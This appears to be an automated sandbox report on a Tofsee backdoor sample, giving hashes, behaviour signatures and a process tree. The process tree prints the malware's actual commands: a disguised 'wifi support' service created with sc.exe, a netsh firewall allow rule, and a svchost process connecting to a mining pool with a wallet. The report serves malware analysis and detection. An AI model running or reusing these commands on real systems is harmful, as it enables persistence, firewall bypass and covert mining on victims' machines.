Analysis

  • max time kernel
    151s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    17-11-2020 12:19

General

  • Target

    46120e1d214529118aa4215d8c856877.exe

  • Size

    11.7MB

  • MD5

    cf99d6d2f10b9fef769e29dc9cabdc6d

  • SHA1

    69abee0ee47ce9ced0db790f39a9afb9b86ac8c8

  • SHA256

    6e325e8c95c86d290e1672117dd49a13f26d00efea9eba81979000d9478c66ef

  • SHA512

    bce3509d547691b7a7dc66d1b38f8cbb480edeae3ca46079a297cd746e3b18300eaa92b15207a16430600bfe962422c8bb33c62a3d4cefdcc60738f8d1d87137

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 18 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\46120e1d214529118aa4215d8c856877.exe
    "C:\Users\Admin\AppData\Local\Temp\46120e1d214529118aa4215d8c856877.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:984
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 568
      2⤵
      • Program crash
      PID:3172
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 684
      2⤵
      • Program crash
      PID:692
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 708
      2⤵
      • Program crash
      PID:3176
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 792
      2⤵
      • Program crash
      PID:3656
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 836
      2⤵
      • Program crash
      PID:3644
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 648
      2⤵
      • Program crash
      PID:200
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 956
      2⤵
      • Program crash
      PID:928
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\euvrcvfr\
      2⤵
        PID:2792
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 704
        2⤵
        • Program crash
        PID:2724
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 792
        2⤵
        • Program crash
        PID:1540
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ylxunafp.exe" C:\Windows\SysWOW64\euvrcvfr\
        2⤵
          PID:1328
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 716
          2⤵
          • Program crash
          PID:2108
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 1012
          2⤵
          • Program crash
          PID:3952
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create euvrcvfr binPath= "C:\Windows\SysWOW64\euvrcvfr\ylxunafp.exe /d\"C:\Users\Admin\AppData\Local\Temp\46120e1d214529118aa4215d8c856877.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:3808
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 520
            2⤵
            • Program crash
            PID:3868
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 1036
            2⤵
            • Program crash
            PID:3428
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description euvrcvfr "wifi internet conection"
            2⤵
              PID:3156
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 776
              2⤵
              • Program crash
              PID:3392
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 524
              2⤵
              • Program crash
              PID:2500
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start euvrcvfr
              2⤵
                PID:196
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 1012
                2⤵
                • Program crash
                PID:3732
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 1060
                2⤵
                • Program crash
                PID:1864
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:2924
              • C:\Windows\SysWOW64\euvrcvfr\ylxunafp.exe
                C:\Windows\SysWOW64\euvrcvfr\ylxunafp.exe /d"C:\Users\Admin\AppData\Local\Temp\46120e1d214529118aa4215d8c856877.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2208
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 596
                  2⤵
                  • Program crash
                  PID:2112
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Modifies service
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:856
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3444

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\ylxunafp.exe
                MD5

                5fc6a58dfe45884616bafd0708b8a443

                SHA1

                81c997fc49eb6837d0cc5ba1bf571cbf2d8b8acb

                SHA256

                608971900804d7b76fcb0b7ad5b469ca77d67c7d3e2796b1ecb6df03c1374c3d

                SHA512

                cc5af30772d555b2ddbd7e9fec3ef841892acd1a44ff8531908d6cf7474c31d2cbbd04b8f6f66d14ebae8055383c26c1c6b19ac6192832a480fb3e3fe329f9b8

              • C:\Windows\SysWOW64\euvrcvfr\ylxunafp.exe
                MD5

                5fc6a58dfe45884616bafd0708b8a443

                SHA1

                81c997fc49eb6837d0cc5ba1bf571cbf2d8b8acb

                SHA256

                608971900804d7b76fcb0b7ad5b469ca77d67c7d3e2796b1ecb6df03c1374c3d

                SHA512

                cc5af30772d555b2ddbd7e9fec3ef841892acd1a44ff8531908d6cf7474c31d2cbbd04b8f6f66d14ebae8055383c26c1c6b19ac6192832a480fb3e3fe329f9b8

              • memory/196-9-0x0000000000000000-mapping.dmp
              • memory/856-18-0x0000000002FE0000-0x0000000002FE6000-memory.dmp
                Filesize

                24KB

              • memory/856-21-0x0000000009410000-0x000000000981B000-memory.dmp
                Filesize

                4.0MB

              • memory/856-20-0x00000000032D0000-0x00000000032D5000-memory.dmp
                Filesize

                20KB

              • memory/856-22-0x00000000032E0000-0x00000000032E7000-memory.dmp
                Filesize

                28KB

              • memory/856-17-0x0000000004D50000-0x0000000004F5F000-memory.dmp
                Filesize

                2.1MB

              • memory/856-19-0x0000000002FF0000-0x0000000003000000-memory.dmp
                Filesize

                64KB

              • memory/856-14-0x0000000002E90000-0x0000000002EA5000-memory.dmp
                Filesize

                84KB

              • memory/856-15-0x0000000002E99A6B-mapping.dmp
              • memory/856-16-0x0000000002E90000-0x0000000002EA5000-memory.dmp
                Filesize

                84KB

              • memory/984-1-0x0000000004160000-0x0000000004161000-memory.dmp
                Filesize

                4KB

              • memory/984-0-0x00000000025E6000-0x00000000025E7000-memory.dmp
                Filesize

                4KB

              • memory/1328-5-0x0000000000000000-mapping.dmp
              • memory/2208-12-0x0000000002C60000-0x0000000002C61000-memory.dmp
                Filesize

                4KB

              • memory/2208-11-0x0000000002361000-0x0000000002364000-memory.dmp
                Filesize

                12KB

              • memory/2792-4-0x0000000000000000-mapping.dmp
              • memory/2924-13-0x0000000000000000-mapping.dmp
              • memory/3156-8-0x0000000000000000-mapping.dmp
              • memory/3444-23-0x0000000002900000-0x00000000029F1000-memory.dmp
                Filesize

                964KB

              • memory/3444-25-0x000000000299259C-mapping.dmp
              • memory/3808-7-0x0000000000000000-mapping.dmp